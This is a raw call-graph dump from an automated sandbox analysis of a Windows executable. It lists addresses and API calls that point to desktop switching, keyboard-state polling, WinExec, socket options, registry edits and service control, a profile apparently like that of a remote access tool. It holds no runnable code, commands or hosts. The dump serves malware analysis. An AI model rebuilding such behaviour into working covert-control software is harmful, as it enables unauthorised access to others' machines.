7ff6c2c38e5c 70 API calls 4 library calls 22483->22612 22486 7ff6c2ba39c2 22486->22472 22489 7ff6c2b83730 _RunAllParam 89 API calls 22486->22489 22614 7ff6c2bed710 15 API calls 22487->22614 22489->22472 22490 7ff6c2ba3ec4 22490->22472 22615 7ff6c2bed600 14 API calls 22490->22615 22492 7ff6c2ba3eed 22492->22472 22493 7ff6c2b83730 _RunAllParam 89 API calls 22492->22493 22494 7ff6c2ba3f0d EnterCriticalSection 22493->22494 22496 7ff6c2c392a4 __wtomb_environ 70 API calls 22494->22496 22497 
7ff6c2ba3f5f CreateRectRgn 22496->22497 22498 7ff6c2ba3f95 DeleteObject 22497->22498 22499 7ff6c2c38bf4 free 70 API calls 22498->22499 22500 7ff6c2ba3faa LeaveCriticalSection 22499->22500 22616 7ff6c2c17d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 22500->22616 22558 7ff6c2ba33c1 22557->22558 22559 7ff6c2bed170 2 API calls 22558->22559 22560 7ff6c2ba33cf 22559->22560 22561 7ff6c2ba33d3 GetLastError 22560->22561 22564 7ff6c2ba33f1 22560->22564 22562 7ff6c2b83730 _RunAllParam 89 API calls 22561->22562 22562->22564 22563 7ff6c2b83730 _RunAllParam 89 API calls 22565 7ff6c2ba351a 22563->22565 22566 7ff6c2b83730 _RunAllParam 89 API calls 22564->22566 22567 7ff6c2ba3441 22564->22567 22565->22436 22566->22567 22567->22563 22568 7ff6c2ba349e 22567->22568 22568->22436 22579 7ff6c2b9f980 22569->22579 22571 7ff6c2b9fae6 SleepEx 22571->22579 22572 7ff6c2b9fb50 22584 7ff6c2b9fb49 22572->22584 22633 7ff6c2c38bbc 70 API calls swscanf 22572->22633 22573 7ff6c2c37220 _getdrive 8 API calls 22575 7ff6c2b9fc50 22573->22575 22575->22438 22575->22441 22577 7ff6c2b9fb8c 22583 7ff6c2b83730 _RunAllParam 89 API calls 22577->22583 22577->22584 22578 7ff6c2b9fa11 22578->22571 22578->22579 22632 7ff6c2bed890 97 API calls _RunAllParam 22578->22632 22579->22571 22579->22572 22579->22578 22580 7ff6c2b9fa5e EnterCriticalSection 22579->22580 22579->22584 22618 7ff6c2c37c50 22579->22618 22624 7ff6c2bed1f0 GetTickCount 22579->22624 22582 7ff6c2b9fa91 LeaveCriticalSection 22580->22582 22582->22579 22583->22584 22584->22573 22586 7ff6c2c3854e _recalloc 22585->22586 22587 7ff6c2c3ffc8 _errno 70 API calls 22586->22587 22590 7ff6c2c38563 22586->22590 22588 7ff6c2c38558 22587->22588 22589 7ff6c2c449d4 _invalid_parameter_noinfo 17 API calls 22588->22589 22589->22590 22590->22444 22592 7ff6c2bea340 FindWindowExA 22591->22592 22593 7ff6c2ba3856 22592->22593 22594 7ff6c2bea35d GetWindowThreadProcessId GetCurrentProcessId 22592->22594 22593->22456 22593->22458 
22593->22461 22594->22592 22595 7ff6c2bea37c PostMessageA 22594->22595 22595->22593 22597 7ff6c2bea303 22596->22597 22598 7ff6c2bea2b0 22596->22598 22600 7ff6c2bea340 FindWindowExA 22597->22600 22598->22597 22599 7ff6c2bea2b9 FindWindowA 22598->22599 22601 7ff6c2bea2dd PostMessageA 22599->22601 22602 7ff6c2bea2cd 22599->22602 22603 7ff6c2bea392 22600->22603 22604 7ff6c2bea35d GetWindowThreadProcessId GetCurrentProcessId 22600->22604 22601->22486 22602->22486 22603->22486 22604->22600 22605 7ff6c2bea37c PostMessageA 22604->22605 22605->22603 22607 7ff6c2bed182 22606->22607 22608 7ff6c2bed18a setsockopt 22606->22608 22607->22455 22608->22607 22609 7ff6c2bed1b5 setsockopt 22608->22609 22609->22455 22610->22466 22611->22478 22612->22477 22613->22487 22614->22490 22615->22492 22617->22472 22619 7ff6c2c37c83 _recalloc 22618->22619 22620 7ff6c2c3ffc8 _errno 70 API calls 22619->22620 22623 7ff6c2c37c98 22619->22623 22621 7ff6c2c37c8d 22620->22621 22622 7ff6c2c449d4 _invalid_parameter_noinfo 17 API calls 22621->22622 22622->22623 22623->22579 22625 7ff6c2bed22f 22624->22625 22627 7ff6c2bed2b6 22624->22627 22628 7ff6c2bedd90 11 API calls 22625->22628 22626 7ff6c2bed25f 22626->22579 22627->22626 22630 7ff6c2bedd90 11 API calls 22627->22630 22629 7ff6c2bed25b 22628->22629 22629->22626 22629->22627 22631 7ff6c2bedd90 11 API calls 22629->22631 22630->22626 22631->22629 22632->22578 22633->22577 23355 7ff6c2b828d0 81 API calls 23358 7ff6c2bb1ae0 15 API calls _getdrive 23359 7ff6c2bb08e0 117 API calls _RunAllParam 22865 7ff6c2ba4cdb 23076 7ff6c2bed890 97 API calls _RunAllParam 22865->23076 22867 7ff6c2ba4cfc 22868 7ff6c2ba4d52 22867->22868 22930 7ff6c2bd0650 22867->22930 23077 7ff6c2baf010 SetEvent 22868->23077 22872 7ff6c2ba7c72 22873 7ff6c2ba7c81 Sleep 22872->22873 22874 7ff6c2ba7c95 22872->22874 22873->22874 22875 7ff6c2ba7cf7 22874->22875 22876 7ff6c2ba7ca6 FlushFileBuffers 22874->22876 22878 7ff6c2ba7d59 22875->22878 22879 7ff6c2ba7d08 FlushFileBuffers 22875->22879 
22876->22875 22877 7ff6c2ba7ce6 CloseHandle 22876->22877 22877->22875 23081 7ff6c2bea3b0 93 API calls 2 library calls 22878->23081 22879->22878 22881 7ff6c2ba7d48 CloseHandle 22879->22881 22881->22878 22882 7ff6c2ba7d62 22884 7ff6c2ba7d85 22882->22884 23082 7ff6c2bb2170 16 API calls 22882->23082 22886 7ff6c2ba7d9d CloseDesktop 22884->22886 22887 7ff6c2ba7dbc 22884->22887 22886->22887 22889 7ff6c2ba7da7 22886->22889 22894 7ff6c2b83730 _RunAllParam 89 API calls 22887->22894 22888 7ff6c2bb2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22925 7ff6c2ba4003 22888->22925 22892 7ff6c2b83730 _RunAllParam 89 API calls 22889->22892 22890 7ff6c2ba31b0 27 API calls 22890->22925 22892->22887 22893 7ff6c2bac590 16 API calls 22893->22925 22895 7ff6c2ba7dfc GetModuleFileNameA 22894->22895 22899 7ff6c2ba7e15 22895->22899 22900 7ff6c2ba7e56 LoadLibraryA 22895->22900 22897 7ff6c2ba419d GetTickCount 22897->22925 22898 7ff6c2b83730 _RunAllParam 89 API calls 22901 7ff6c2ba4075 OpenInputDesktop 22898->22901 23083 7ff6c2c3a140 70 API calls 3 library calls 22899->23083 22903 7ff6c2ba7e6b GetProcAddress 22900->22903 22904 7ff6c2ba7e9d 22900->22904 22905 7ff6c2ba7c54 22901->22905 22901->22925 22910 7ff6c2ba7e8f FreeLibrary 22903->22910 22919 7ff6c2ba7edd 22904->22919 23084 7ff6c2b9e580 97 API calls _RunAllParam 22904->23084 22909 7ff6c2b83730 _RunAllParam 89 API calls 22905->22909 22906 7ff6c2ba7e26 22906->22900 22907 7ff6c2bed440 16 API calls 22907->22925 22908 7ff6c2b83730 89 API calls _RunAllParam 22908->22925 22909->22872 22910->22904 22914 7ff6c2bed890 97 API calls 22914->22925 22915 7ff6c2ba7c47 CloseDesktop 22915->22872 22915->22905 22918 7ff6c2ba40bf CloseDesktop 22918->22925 22920 7ff6c2ba7fb2 22919->22920 22924 7ff6c2b83730 _RunAllParam 89 API calls 22919->22924 22923 7ff6c2c37220 _getdrive 8 API calls 22920->22923 22921 7ff6c2ba7b99 LeaveCriticalSection 22921->22925 22926 7ff6c2ba7ff0 22923->22926 22928 7ff6c2ba7f3e 22924->22928 22925->22872 22925->22888 
22925->22890 22925->22893 22925->22897 22925->22898 22925->22907 22925->22908 22925->22914 22925->22915 22925->22918 22925->22921 23072 7ff6c2bea5b0 98 API calls 2 library calls 22925->23072 23073 7ff6c2bea3b0 93 API calls 2 library calls 22925->23073 23074 7ff6c2be95d0 EnterCriticalSection LeaveCriticalSection 22925->23074 23075 7ff6c2bac6f0 18 API calls _RunAllParam 22925->23075 23078 7ff6c2bab290 148 API calls 22925->23078 23079 7ff6c2bac660 17 API calls 22925->23079 23080 7ff6c2bac4e0 93 API calls _RunAllParam 22925->23080 23085 7ff6c2beab00 95 API calls _RunAllParam 22928->23085 22931 7ff6c2b83730 _RunAllParam 89 API calls 22930->22931 22932 7ff6c2bd068e 22931->22932 22933 7ff6c2bd09af VkKeyScanA 22932->22933 22934 7ff6c2bd102e 22932->22934 22936 7ff6c2b83730 _RunAllParam 89 API calls 22932->22936 22940 7ff6c2bd09c2 22933->22940 22937 7ff6c2bd109a 22934->22937 22941 7ff6c2b83730 _RunAllParam 89 API calls 22934->22941 22935 7ff6c2b83730 _RunAllParam 89 API calls 22938 7ff6c2bd0a08 22935->22938 22939 7ff6c2bd0743 22936->22939 22948 7ff6c2bd10ee 22937->22948 23120 7ff6c2bd2ef0 81 API calls 22937->23120 22942 7ff6c2bd0a13 22938->22942 22943 7ff6c2bd0d54 GetKeyState 22938->22943 22944 7ff6c2b83730 _RunAllParam 89 API calls 22939->22944 22940->22935 22941->22937 22946 7ff6c2bd0d0a 22942->22946 22947 7ff6c2b83730 _RunAllParam 89 API calls 22942->22947 22945 7ff6c2bd0d71 22943->22945 22944->22933 22950 7ff6c2bd0dbf 22945->22950 23039 7ff6c2bd0eaa 22945->23039 22946->22868 22951 7ff6c2bd0a33 22947->22951 23086 7ff6c2bd1620 22948->23086 22954 7ff6c2bd0e0a 22950->22954 22955 7ff6c2bd0dc9 GetAsyncKeyState 22950->22955 22957 7ff6c2b83730 _RunAllParam 89 API calls 22951->22957 22952 7ff6c2b83730 _RunAllParam 89 API calls 22960 7ff6c2bd0fe2 MapVirtualKeyA 22952->22960 22953 7ff6c2bd10df 23121 7ff6c2bd2370 71 API calls 22953->23121 22958 7ff6c2bd0e14 GetAsyncKeyState 22954->22958 22959 7ff6c2bd0e58 22954->22959 22955->22954 22962 7ff6c2bd0dd8 MapVirtualKeyA 22955->22962 22964 
7ff6c2bd0a4b 22957->22964 22958->22959 22965 7ff6c2bd0e24 MapVirtualKeyA 22958->22965 22967 7ff6c2bd0e62 GetAsyncKeyState 22959->22967 22968 7ff6c2bd0eb3 22959->22968 23115 7ff6c2b974c0 18 API calls 22960->23115 23109 7ff6c2b974c0 18 API calls 22962->23109 22963 7ff6c2bd1108 22973 7ff6c2bd115f GetAsyncKeyState 22963->22973 22989 7ff6c2bd111e 22963->22989 22970 7ff6c2bd0d37 22964->22970 22971 7ff6c2bd0a58 22964->22971 23110 7ff6c2b974c0 18 API calls 22965->23110 22975 7ff6c2bd0e76 MapVirtualKeyA 22967->22975 22967->23039 22978 7ff6c2bd0ec6 GetAsyncKeyState 22968->22978 22979 7ff6c2bd0f17 GetAsyncKeyState 22968->22979 22968->23039 22980 7ff6c2b83730 _RunAllParam 89 API calls 22970->22980 22981 7ff6c2bd0ad4 GetAsyncKeyState 22971->22981 22982 7ff6c2bd0b27 GetAsyncKeyState 22971->22982 22984 7ff6c2bd1174 GetAsyncKeyState 22973->22984 22973->22989 22974 7ff6c2bd1001 23116 7ff6c2bd02a0 109 API calls _RunAllParam 22974->23116 23111 7ff6c2b974c0 18 API calls 22975->23111 22976 7ff6c2bd0def 22987 7ff6c2b83730 _RunAllParam 89 API calls 22976->22987 22977 7ff6c2bd124d MapVirtualKeyA 23123 7ff6c2b974c0 18 API calls 22977->23123 22991 7ff6c2bd0eda MapVirtualKeyA 22978->22991 22978->23039 22995 7ff6c2bd0f62 GetAsyncKeyState 22979->22995 22996 7ff6c2bd0f27 MapVirtualKeyA 22979->22996 22980->22946 22992 7ff6c2bd0aec MapVirtualKeyA 22981->22992 23036 7ff6c2bd0b1e 22981->23036 22998 7ff6c2bd0b3c MapVirtualKeyA 22982->22998 22999 7ff6c2bd0b77 GetAsyncKeyState 22982->22999 22983 7ff6c2bd0e3b 22993 7ff6c2b83730 _RunAllParam 89 API calls 22983->22993 22984->22989 22994 7ff6c2bd1184 22984->22994 22987->22954 22989->22977 22990 7ff6c2bd1151 22989->22990 22990->22977 23112 7ff6c2b974c0 18 API calls 22991->23112 23093 7ff6c2b974c0 18 API calls 22992->23093 22993->22959 22994->22989 23014 7ff6c2b83730 _RunAllParam 89 API calls 22994->23014 23006 7ff6c2bd0f72 MapVirtualKeyA 22995->23006 22995->23039 23113 7ff6c2b974c0 18 API calls 22996->23113 22997 7ff6c2bd100a 23117 7ff6c2bd02a0 109 API 
calls _RunAllParam 22997->23117 23094 7ff6c2b974c0 18 API calls 22998->23094 23002 7ff6c2bd0b87 MapVirtualKeyA 22999->23002 22999->23036 23000 7ff6c2bd0e8d 23010 7ff6c2b83730 _RunAllParam 89 API calls 23000->23010 23001 7ff6c2bd1267 23001->23001 23095 7ff6c2b974c0 18 API calls 23002->23095 23004 7ff6c2b83730 _RunAllParam 89 API calls 23013 7ff6c2bd0bf1 MapVirtualKeyA 23004->23013 23114 7ff6c2b974c0 18 API calls 23006->23114 23010->23039 23012 7ff6c2bd0ef1 23021 7ff6c2b83730 _RunAllParam 89 API calls 23012->23021 23096 7ff6c2b974c0 18 API calls 23013->23096 23023 7ff6c2bd11a5 23014->23023 23015 7ff6c2bd0f40 23024 7ff6c2b83730 _RunAllParam 89 API calls 23015->23024 23017 7ff6c2bd0b03 23026 7ff6c2b83730 _RunAllParam 89 API calls 23017->23026 23018 7ff6c2bd1013 23118 7ff6c2bd02a0 109 API calls _RunAllParam 23018->23118 23019 7ff6c2bd0b55 23028 7ff6c2b83730 _RunAllParam 89 API calls 23019->23028 23020 7ff6c2bd0ba0 23030 7ff6c2b83730 _RunAllParam 89 API calls 23020->23030 23021->23039 23032 7ff6c2bd11ba 23023->23032 23033 7ff6c2bd1206 23023->23033 23034 7ff6c2bd0f5e 23024->23034 23025 7ff6c2bd0f8b 23035 7ff6c2b83730 _RunAllParam 89 API calls 23025->23035 23026->23036 23029 7ff6c2bd0b73 23028->23029 23029->22999 23030->23036 23031 7ff6c2bd0c08 MapVirtualKeyA 23097 7ff6c2b974c0 18 API calls 23031->23097 23042 7ff6c2b83730 _RunAllParam 89 API calls 23032->23042 23053 7ff6c2bd11fd 23032->23053 23043 7ff6c2b83730 _RunAllParam 89 API calls 23033->23043 23033->23053 23034->22995 23035->23039 23036->23004 23037 7ff6c2bd101c 23119 7ff6c2bd02a0 109 API calls _RunAllParam 23037->23119 23039->22952 23041 7ff6c2bd0c1f MapVirtualKeyA 23098 7ff6c2b974c0 18 API calls 23041->23098 23046 7ff6c2bd11ce CreateThread CloseHandle 23042->23046 23047 7ff6c2bd121a 23043->23047 23044 7ff6c2bd1025 23044->22934 23046->23053 23122 7ff6c2bea910 116 API calls _RunAllParam 23047->23122 23048 7ff6c2b83730 _RunAllParam 89 API calls 23051 7ff6c2bd1230 WinExec 23048->23051 23049 7ff6c2bd0c36 MapVirtualKeyA 
23099 7ff6c2b974c0 18 API calls 23049->23099 23051->22990 23053->23048 23054 7ff6c2bd0c53 MapVirtualKeyA 23100 7ff6c2b974c0 18 API calls 23054->23100 23056 7ff6c2bd0c6c MapVirtualKeyA 23101 7ff6c2b974c0 18 API calls 23056->23101 23058 7ff6c2bd0c89 MapVirtualKeyA 23102 7ff6c2b974c0 18 API calls 23058->23102 23060 7ff6c2bd0ca2 MapVirtualKeyA 23103 7ff6c2b974c0 18 API calls 23060->23103 23062 7ff6c2bd0cbf MapVirtualKeyA 23104 7ff6c2b974c0 18 API calls 23062->23104 23064 7ff6c2bd0cd8 MapVirtualKeyA 23105 7ff6c2b974c0 18 API calls 23064->23105 23066 7ff6c2bd0cef 23106 7ff6c2bd02a0 109 API calls _RunAllParam 23066->23106 23068 7ff6c2bd0cf8 23107 7ff6c2bd02a0 109 API calls _RunAllParam 23068->23107 23070 7ff6c2bd0d01 23108 7ff6c2bd02a0 109 API calls _RunAllParam 23070->23108 23072->22925 23073->22925 23075->22925 23076->22867 23077->22925 23078->22925 23079->22925 23080->22925 23081->22882 23083->22906 23085->22920 23087 7ff6c2bd163b 23086->23087 23089 7ff6c2bd1665 23087->23089 23124 7ff6c2bd2f30 23087->23124 23089->22963 23092 7ff6c2bd169c 23092->22963 23093->23017 23094->23019 23095->23020 23096->23031 23097->23041 23098->23049 23099->23054 23100->23056 23101->23058 23102->23060 23103->23062 23104->23064 23105->23066 23106->23068 23107->23070 23108->22946 23109->22976 23110->22983 23111->23000 23112->23012 23113->23015 23114->23025 23115->22974 23116->22997 23117->23018 23118->23037 23119->23044 23120->22953 23121->22948 23122->23053 23123->23001 23128 7ff6c2bd2ff0 23124->23128 23126 7ff6c2bd1689 23127 7ff6c2bd2550 71 API calls 23126->23127 23127->23092 23129 7ff6c2c37978 81 API calls 23128->23129 23130 7ff6c2bd3003 23129->23130 23131 7ff6c2bd3008 23130->23131 23156 7ff6c2c3749c 70 API calls std::exception::exception 23130->23156 23131->23126 23133 7ff6c2bd3043 23134 7ff6c2c42950 RaiseException 23133->23134 23135 7ff6c2bd3060 GetWindowLongPtrA 23134->23135 23136 7ff6c2bd3140 23135->23136 23137 7ff6c2bd30b9 23135->23137 23138 7ff6c2bd3265 EndDialog 23136->23138 23139 
7ff6c2bd31ae SetWindowLongPtrA GetDlgItem 23137->23139 23143 7ff6c2bd30c5 23137->23143 23140 7ff6c2bd31a7 23138->23140 23141 7ff6c2bd31de SendMessageA GetDlgItem 23139->23141 23142 7ff6c2c37220 _getdrive 8 API calls 23140->23142 23146 7ff6c2bd320f SetForegroundWindow 23141->23146 23147 7ff6c2bd328a 23142->23147 23143->23136 23143->23140 23144 7ff6c2bd30e4 23143->23144 23145 7ff6c2bd314a GetDlgItem SendMessageA 23143->23145 23144->23140 23148 7ff6c2bd30ef GetDlgItem SendMessageA 23144->23148 23149 7ff6c2bd3174 SendMessageA 23145->23149 23150 7ff6c2bd318f 23145->23150 23152 7ff6c2bd322e 23146->23152 23147->23126 23148->23136 23151 7ff6c2bd3117 SendMessageA 23148->23151 23149->23150 23150->23138 23151->23136 23153 7ff6c2bd3132 23151->23153 23154 7ff6c2bd323a GetDlgItem EnableWindow 23152->23154 23155 7ff6c2bd324d GetDlgItem EnableWindow 23152->23155 23153->23136 23154->23140 23155->23140 23156->23133 23157 7ff6c2ba80da 23176 7ff6c2b90270 23157->23176 23159 7ff6c2ba81c6 23160 7ff6c2c392a4 __wtomb_environ 70 API calls 23159->23160 23161 7ff6c2ba81e7 CreateRectRgn 23160->23161 23183 7ff6c2b821e0 23161->23183 23163 7ff6c2ba8211 LoadLibraryA 23164 7ff6c2ba825e 23163->23164 23165 7ff6c2ba8247 GetProcAddress 23163->23165 23166 7ff6c2b83730 _RunAllParam 89 API calls 23164->23166 23165->23164 23167 7ff6c2ba828f 23166->23167 23168 7ff6c2b83730 _RunAllParam 89 API calls 23167->23168 23169 7ff6c2ba82f7 23168->23169 23170 7ff6c2c37978 81 API calls 23169->23170 23171 7ff6c2ba831e 23170->23171 23172 7ff6c2c37978 81 API calls 23171->23172 23173 7ff6c2ba8454 23172->23173 23174 7ff6c2ba8469 23173->23174 23185 7ff6c2b93fb0 23173->23185 23177 7ff6c2c392a4 __wtomb_environ 70 API calls 23176->23177 23178 7ff6c2b9028f CreateRectRgn 23177->23178 23179 7ff6c2c392a4 __wtomb_environ 70 API calls 23178->23179 23180 7ff6c2b902b3 CreateRectRgn 23179->23180 23181 7ff6c2c392a4 __wtomb_environ 70 API calls 23180->23181 23182 7ff6c2b902d7 CreateRectRgn 23181->23182 23182->23159 23184 7ff6c2b82259 
23183->23184 23184->23163 23186 7ff6c2b93fe1 _recalloc 23185->23186 23187 7ff6c2b9408b GetComputerNameA 23186->23187 23188 7ff6c2b940d0 LoadLibraryA 23187->23188 23189 7ff6c2b940a6 23187->23189 23190 7ff6c2b940e6 23188->23190 23191 7ff6c2b940fd 23188->23191 23189->23188 23193 7ff6c2b8a040 8 API calls 23190->23193 23191->23174 23193->23191 23361 7ff6c2b856e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23362 7ff6c2ba90f0 EnterCriticalSection LeaveCriticalSection 23363 7ff6c2bad0f0 DialogBoxParamA 23364 7ff6c2baf6f0 10 API calls _getdrive 23366 7ff6c2b9a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 23368 7ff6c2ba9480 117 API calls _RunAllParam 23369 7ff6c2b92880 196 API calls 23370 7ff6c2b8d880 6 API calls _RunAllParam 23371 7ff6c2baa085 98 API calls 23372 7ff6c2be5e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23377 7ff6c2b9a890 97 API calls 2 library calls 22037 7ff6c2ba88a0 getpeername inet_ntoa 22049 7ff6c2c392a4 22037->22049 22042 7ff6c2ba893d InitializeCriticalSection 22075 7ff6c2c179a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 22042->22075 22044 7ff6c2ba895e 22045 7ff6c2ba8988 22044->22045 22071 7ff6c2b9f840 22044->22071 22076 7ff6c2c37220 22045->22076 22047 7ff6c2ba89c3 22050 7ff6c2c392bb _tzset 22049->22050 22051 7ff6c2ba8913 22049->22051 22087 7ff6c2c38c34 22050->22087 22059 7ff6c2c37978 22051->22059 22055 7ff6c2c392e3 22055->22051 22056 7ff6c2c392ec 22055->22056 22105 7ff6c2c44930 16 API calls _tzset 22056->22105 22063 7ff6c2c37983 22059->22063 22060 7ff6c2c38c34 malloc 70 API calls 22060->22063 22061 7ff6c2ba8930 22061->22042 22061->22044 22062 7ff6c2c43238 _callnewh DecodePointer 22062->22063 22063->22060 22063->22061 22063->22062 22066 7ff6c2c379a2 22063->22066 22064 7ff6c2c379f3 22163 7ff6c2c3755c 70 API calls std::exception::operator= 22064->22163 22066->22064 22162 7ff6c2c37b94 80 API calls 22066->22162 22067 7ff6c2c37a04 
22164 7ff6c2c42950 22067->22164 22070 7ff6c2c37a1a 22072 7ff6c2b9f885 22071->22072 22167 7ff6c2c17b50 EnterCriticalSection 22072->22167 22074 7ff6c2b9f926 22074->22045 22075->22044 22077 7ff6c2c37229 22076->22077 22078 7ff6c2c37234 22077->22078 22079 7ff6c2c429e4 RtlCaptureContext RtlLookupFunctionEntry 22077->22079 22078->22047 22080 7ff6c2c42a69 22079->22080 22081 7ff6c2c42a28 RtlVirtualUnwind 22079->22081 22082 7ff6c2c42a8b IsDebuggerPresent 22080->22082 22081->22082 22223 7ff6c2c4dc94 22082->22223 22084 7ff6c2c42aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22085 7ff6c2c42b08 _getdrive 22084->22085 22086 7ff6c2c42b12 GetCurrentProcess TerminateProcess 22084->22086 22085->22086 22086->22047 22088 7ff6c2c38cc8 22087->22088 22089 7ff6c2c38c4c 22087->22089 22090 7ff6c2c43238 _callnewh DecodePointer 22088->22090 22091 7ff6c2c38c84 HeapAlloc 22089->22091 22092 7ff6c2c38c64 22089->22092 22097 7ff6c2c38cad 22089->22097 22101 7ff6c2c38cb2 22089->22101 22109 7ff6c2c43238 DecodePointer 22089->22109 22093 7ff6c2c38ccd 22090->22093 22091->22089 22096 7ff6c2c38cbd 22091->22096 22092->22091 22106 7ff6c2c42ed0 70 API calls 2 library calls 22092->22106 22107 7ff6c2c42c70 70 API calls 4 library calls 22092->22107 22108 7ff6c2c3abd8 GetModuleHandleW GetProcAddress ExitProcess malloc 22092->22108 22095 7ff6c2c3ffc8 _errno 69 API calls 22093->22095 22095->22096 22096->22051 22104 7ff6c2c37de8 70 API calls 2 library calls 22096->22104 22111 7ff6c2c3ffc8 22097->22111 22103 7ff6c2c3ffc8 _errno 69 API calls 22101->22103 22103->22096 22104->22055 22106->22092 22107->22092 22110 7ff6c2c43253 22109->22110 22110->22089 22114 7ff6c2c437c4 GetLastError FlsGetValue 22111->22114 22113 7ff6c2c3ffd1 22113->22101 22115 7ff6c2c437ea 22114->22115 22116 7ff6c2c43832 SetLastError 22114->22116 22126 7ff6c2c432ec 22115->22126 22116->22113 22119 7ff6c2c437ff FlsSetValue 22120 7ff6c2c4382b 22119->22120 22121 7ff6c2c43815 22119->22121 22140 7ff6c2c38bf4 22120->22140 22131 7ff6c2c4370c 
22121->22131 22125 7ff6c2c43830 22125->22116 22127 7ff6c2c43311 22126->22127 22129 7ff6c2c43351 22127->22129 22130 7ff6c2c4332f Sleep 22127->22130 22146 7ff6c2c49234 22127->22146 22129->22116 22129->22119 22130->22127 22130->22129 22154 7ff6c2c477d0 22131->22154 22133 7ff6c2c43765 22134 7ff6c2c476d0 _isindst LeaveCriticalSection 22133->22134 22135 7ff6c2c4377a 22134->22135 22136 7ff6c2c477d0 _lock 70 API calls 22135->22136 22137 7ff6c2c43784 ___lc_codepage_func 22136->22137 22138 7ff6c2c476d0 _isindst LeaveCriticalSection 22137->22138 22139 7ff6c2c437b6 GetCurrentThreadId 22138->22139 22139->22116 22141 7ff6c2c38bf9 RtlFreeHeap 22140->22141 22145 7ff6c2c38c29 free 22140->22145 22142 7ff6c2c38c14 22141->22142 22141->22145 22143 7ff6c2c3ffc8 _errno 68 API calls 22142->22143 22144 7ff6c2c38c19 GetLastError 22143->22144 22144->22145 22145->22125 22147 7ff6c2c49249 22146->22147 22152 7ff6c2c49266 22146->22152 22148 7ff6c2c49257 22147->22148 22147->22152 22149 7ff6c2c3ffc8 _errno 69 API calls 22148->22149 22151 7ff6c2c4925c 22149->22151 22150 7ff6c2c4927e HeapAlloc 22150->22151 22150->22152 22151->22127 22152->22150 22152->22151 22153 7ff6c2c43238 _callnewh DecodePointer 22152->22153 22153->22152 22155 7ff6c2c477ff EnterCriticalSection 22154->22155 22156 7ff6c2c477ee 22154->22156 22160 7ff6c2c476e8 70 API calls 7 library calls 22156->22160 22158 7ff6c2c477f3 22158->22155 22161 7ff6c2c3af34 70 API calls 5 library calls 22158->22161 22160->22158 22161->22155 22162->22064 22163->22067 22165 7ff6c2c4297e 22164->22165 22166 7ff6c2c429bd RaiseException 22165->22166 22166->22070 22168 7ff6c2c17b6d 22167->22168 22169 7ff6c2c17b84 22167->22169 22170 7ff6c2c42950 RaiseException 22168->22170 22187 7ff6c2c4285c 22169->22187 22170->22169 22173 7ff6c2c17bc9 GetLastError 22175 7ff6c2c42950 RaiseException 22173->22175 22174 7ff6c2c17c0b 22176 7ff6c2c17c18 SetThreadPriority 22174->22176 22177 7ff6c2c17be4 22175->22177 22178 7ff6c2c17c27 GetLastError 22176->22178 22179 7ff6c2c17c43 
ResumeThread 22176->22179 22177->22174 22177->22176 22180 7ff6c2c42950 RaiseException 22177->22180 22181 7ff6c2c42950 RaiseException 22178->22181 22182 7ff6c2c17c6e LeaveCriticalSection 22179->22182 22183 7ff6c2c17c52 GetLastError 22179->22183 22180->22174 22184 7ff6c2c17c42 22181->22184 22182->22074 22185 7ff6c2c42950 RaiseException 22183->22185 22184->22179 22186 7ff6c2c17c6d 22185->22186 22186->22182 22188 7ff6c2c42887 22187->22188 22189 7ff6c2c4289c 22187->22189 22190 7ff6c2c3ffc8 _errno 70 API calls 22188->22190 22192 7ff6c2c432ec _getdrive 70 API calls 22189->22192 22191 7ff6c2c4288c 22190->22191 22210 7ff6c2c449d4 22191->22210 22194 7ff6c2c428b0 22192->22194 22195 7ff6c2c42920 22194->22195 22205 7ff6c2c43848 22194->22205 22198 7ff6c2c38bf4 free 70 API calls 22195->22198 22196 7ff6c2c17bb9 22196->22173 22196->22177 22200 7ff6c2c42928 22198->22200 22200->22196 22213 7ff6c2c40008 70 API calls 2 library calls 22200->22213 22201 7ff6c2c4370c _getptd 70 API calls 22202 7ff6c2c428cc CreateThread 22201->22202 22202->22196 22204 7ff6c2c42918 GetLastError 22202->22204 22204->22195 22206 7ff6c2c437c4 _getptd 70 API calls 22205->22206 22207 7ff6c2c43853 22206->22207 22208 7ff6c2c428bd 22207->22208 22214 7ff6c2c3af34 70 API calls 5 library calls 22207->22214 22208->22201 22215 7ff6c2c44964 DecodePointer 22210->22215 22213->22196 22214->22208 22216 7ff6c2c449c3 22215->22216 22217 7ff6c2c449a2 22215->22217 22222 7ff6c2c44930 16 API calls _tzset 22216->22222 22217->22196 22223->22084 23379 7ff6c2bb5ca0 331 API calls 4 library calls 23380 7ff6c2bb54a0 109 API calls 4 library calls 23384 7ff6c2b9cca0 115 API calls 23386 7ff6c2c03ca0 75 API calls 3 library calls 23388 7ff6c2b934b0 13 API calls _getdrive 23389 7ff6c2b93cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23391 7ff6c2b8a6b0 93 API calls 2 library calls 23397 7ff6c2bb1440 126 API calls _RunAllParam 23398 7ff6c2bb5040 SetRectRgn CombineRgn DeleteObject 23399 7ff6c2ba4003 277 API calls 3 
library calls 23400 7ff6c2ba4003 249 API calls 2 library calls 23403 7ff6c2b92a50 SetServiceStatus 23405 7ff6c2b81450 RaiseException 23406 7ff6c2bb3460 122 API calls 2 library calls 23408 7ff6c2bb5a60 8 API calls 23409 7ff6c2ba9060 129 API calls 23412 7ff6c2b85a60 25 API calls 2 library calls 23413 7ff6c2b86060 112 API calls 2 library calls 23414 7ff6c2b83e60 34 API calls 23416 7ff6c2b92a6e SetServiceStatus SetEvent SetEvent 23417 7ff6c2ba8a70 133 API calls 4 library calls 23423 7ff6c2b81a70 CloseClipboard
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
